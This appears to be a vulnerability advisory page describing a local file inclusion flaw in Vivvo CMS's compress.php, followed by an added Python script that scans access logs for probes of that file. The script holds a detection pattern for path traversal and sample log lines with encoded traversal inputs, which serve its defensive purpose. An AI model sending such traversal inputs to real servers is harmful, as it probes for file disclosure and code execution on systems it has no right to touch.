Vendor: Vivvo CMS
By: JaBrOtxHaCkEr
CVSS: 9.3 (HIGH)
Vulnerability: Local File Inclusion
CWE: 98
Product Name: Vivvo CMS
Affected Version From: v4.5
Affected Version To: All
Patch Exists: YES
Related CWE: N/A
CPE: a:vivvo:vivvo_cms
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2011
Vivvo CMS – Local File Inclusion
Vivvo CMS is an intuitive content management system atop a powerful programming framework, empowering numerous industry-leading online newspapers, magazines, journals, TV and radio stations. The vulnerability exists in the compress.php file, which allows an attacker to include arbitrary files from the server. An attacker can exploit it by sending a crafted request to the server that passes a malicious file name as a parameter. This allows the attacker to execute arbitrary code on the server.
Mitigation:
The best way to mitigate this vulnerability is to restrict access to the compress.php file and ensure that it is not accessible from the web. Additionally, it is recommended to update Vivvo CMS to the latest version.
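To check whether compress.php has already been probed, the following added example (not part of the original advisory or of Vivvo's code) scans web server access logs for requests to compress.php whose query values look like file paths rather than asset names. It assumes Combined Log Format; the advisory does not name the affected parameter, so every query parameter is inspected, and the log lines and the `file` parameter name are constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qsl, unquote

# Request portion of a Combined Log Format line (assumed log format).
LOG_RE = re.compile(
    r'^(?P<ip>\S+) .*?"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3})')

# Path-like markers: directory traversal, absolute path, drive letter,
# NUL byte, or a URL scheme where a plain asset name is expected.
SUSPICIOUS = re.compile(
    r'(\.\.[\\/])|(^[\\/])|(^[a-z]:[\\/])|(\x00)|(^[a-z][a-z0-9+.-]*://)', re.I)

def fully_decode(value, rounds=3):
    """Undo nested percent-encoding (e.g. %252e) before matching."""
    for _ in range(rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value

def suspicious_compress_requests(lines):
    """Return (ip, status, param, decoded_value) for flagged compress.php hits."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # not a parsable access-log line
        url = urlsplit(m.group("target"))
        if not url.path.lower().endswith("/compress.php"):
            continue
        # Parameter name is unknown from the advisory, so check them all.
        for name, raw in parse_qsl(url.query, keep_blank_values=True):
            value = fully_decode(raw)
            if SUSPICIOUS.search(value):
                hits.append((m.group("ip"), int(m.group("status")), name, value))
    return hits

# Constructed sample log lines; "file" is a placeholder parameter name.
SAMPLE_LOG = [
    '203.0.113.7 - - [12/Mar/2011:10:01:22 +0000] "GET /compress.php?file=css/style.css HTTP/1.1" 200 5120',
    '203.0.113.9 - - [12/Mar/2011:10:02:40 +0000] "GET /compress.php?file=..%2F..%2Fexample.txt HTTP/1.1" 200 812',
    '203.0.113.9 - - [12/Mar/2011:10:02:41 +0000] "GET /compress.php?file=%252e%252e%252fexample.txt HTTP/1.1" 404 0',
    '198.51.100.4 - - [12/Mar/2011:10:03:05 +0000] "GET /index.php?file=../x HTTP/1.1" 200 100',
]
```

Flagged requests that returned status 200 deserve attention first, since the server answered them with content.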